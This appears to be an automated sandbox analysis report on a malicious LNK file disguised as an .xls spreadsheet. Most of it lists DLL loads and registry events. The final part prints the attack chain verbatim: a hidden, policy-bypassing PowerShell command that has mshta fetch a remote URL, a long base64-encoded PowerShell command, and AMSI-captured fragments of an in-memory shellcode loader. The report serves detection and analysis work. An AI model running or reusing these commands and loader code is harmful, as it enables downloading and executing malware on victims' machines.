Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: ____ ______.xls.lnk.bin.lnk

LNK file: ..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: .pDbY5 source: powershell.exe, 00000000.00000002.1186273619.00007FFC3DC30000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: HP_oXC:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1388672866.00000000074C9000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: .textn.pdb ` source: powershell.exe, 00000006.00000002.1368654410.0000000002D90000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$var_buffer = $var_va.Invoke([IntPtr]::Ze
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('M
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String("H4sIAAAAAAAA/61Xa3OizBL+HH8FH1KlVkwOxMvqnkrVIhfFAJGLl5g3lUIYERkBYRDJu/vfT4OazZ5Nztmqc6yiHGamu59+prunMRC5Nkjs2UQJHURdT1GceGFA3VYql1vLRx5JQuqO+latrNLAJsVSMXhxEXmJ4tB+sRwnRklC/V25GFuxta
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$var_buffer = $var_va.Invoke([IntPtr]::Ze
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('M
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3

Suspicious powershell command line found

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -ExecutionPolicy Bypass -Command "Start-Process mshta -ArgumentList 'https://iplogger.cn/forensicsas.png'"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEALwA2ADEAWABhADMATwBpAHoAQgBMACsASABIADgARgBIADEASwBsAFYAawB3AE8AeABNAHYAcQBuAGsAcgBWAEkAaABmAEYAQQBKAEcATABsADUAZwAzAGwAVQBJAFkARQBSAGsAQgBZAFIARABKAHUALwB2AGYAVAA0AE8AYQB6AFoANQBOAHoAdABtAHEAYwA2AHkAaQBIAEcAYQBtAHUANQA5ACsAcAByAHUAbgBNAFIAQwA1AE4AawBqAHMAMgBVAFEASgBIAFUAUgBkAFQAMQBHAGMAZQBHAEYAQQAzAFYAWQBxAGwAMQB2AEwAUgB4ADUASgBRAHUAcQBPACsAbABhAHQAcgBOAEwAQQBKAHMAVgBTAE0AWABoAHgARQBYAG0ASgA0AHQAQgArAHMAUgB3AG4AUgBrAGwAQwAvAFYAMgA1AEcARgB1AHgAdABhAFYAcQBsADMAcwByAGYAdABtAEcAVABvAHAAUgBnAHkAcABmAGkAbwAzAEkAUwBXAE4AVQB2ADcAaQBvAFgASgBSAFQAYQBaAEIAWQBLAC8AUQBTAFcATQBUAGIAbwA1AGMAdABJAHUAdgBRAFMAYwBCAFEANwBZAG0ATgBJAGoANwBjAFcAbAA3AHcALwBQAFUAcgBsADgAWQB4AEMAcwBqAHgALwBXAGEAQQBDAEoAcwBrAGEATAB2AEUASABrAHAAcQBkAGUAbwA3AE4AVgB1AGoARwBGADAALwBMAEQAZgBJAEoAdABUAGYAMQBPAFgATAB6AFEAQwBIAFMAdwB1AGYAdAB1AFcAYwBaAGEALwBCAEsAVABaAHcAaQBqAFUANQB0AEsAMwBDAGcAeABzAGoAdwBoADYAcABWAGYALwA2AHEAMQBwAC8AdQBtAGEAZQBiADQAUgBkAGEAdQBHAGsAVgBqAFgAeQBoAEsARAB0AGoAWQBOAHgAdABVADcAOQBxAEIAYwBHAHoAVAB4AEMAdABhAHIAaQAyAFgARwBZAGgAQwB0AHkATQAvAE8AQwA1AHUAMwBOAHAARQBTAHYAbAB1AEMAVgBJAC8AWgBxAC8AZQBTAFoARwAxAG4AZwB4ACsAZABPAEYAbABxAFAATQByAFUAcQBEAE0AZgBBAEQAWAB2AGsAcwBOAHEAZwBuAGcAcAA3AFQAOAAvAFAAMQBMAGMAMwBOAEgAbwBhAEUARwArAEwAYgBxAFMAQQBvAEQAaQBNAEQAQgBUAHYAUABSAHMAbABOADAATQByAGMARABEAFMAMABRAHIARQBxAGcAawBjAFkAZQBCAFcANgB3AEEAaQBSAGkAUwBOAEEAKwBxAE0AQgBlAFQAMgBvAFkAOQBxAGwAMABHAEsAYwBRAFAAMABQAHYAMgBwADMAdQBlAGEAaQByAEkAegB1AFgAOABxAFYASABzAHYAQgBMAHYARwBKAEsANAAzAFQAagBIAHgASgAzAFEAbwBaAGQAdwBjADEAWQBFADcAdgA2AEYALwBGADEAeAAxACsAUAAwAFcAWQBQAFgASwBqADgAbwBIAG8AZQBvAGcAagBGAHkATABvAEIAYwBDAC8ATAA2AEwAMQBjAHIARgB4AFYATQA1AFIATwBCAFAAYgBSAHcAbQBYAGkAbAAzAFIAOQBFAE4AUwBnAEUAUQBGAGcAbgBqAHYARABoAE8ATQAwADUAUgAvAGYAbgBuACsAUgB6AE4AbgBpAFcAVAB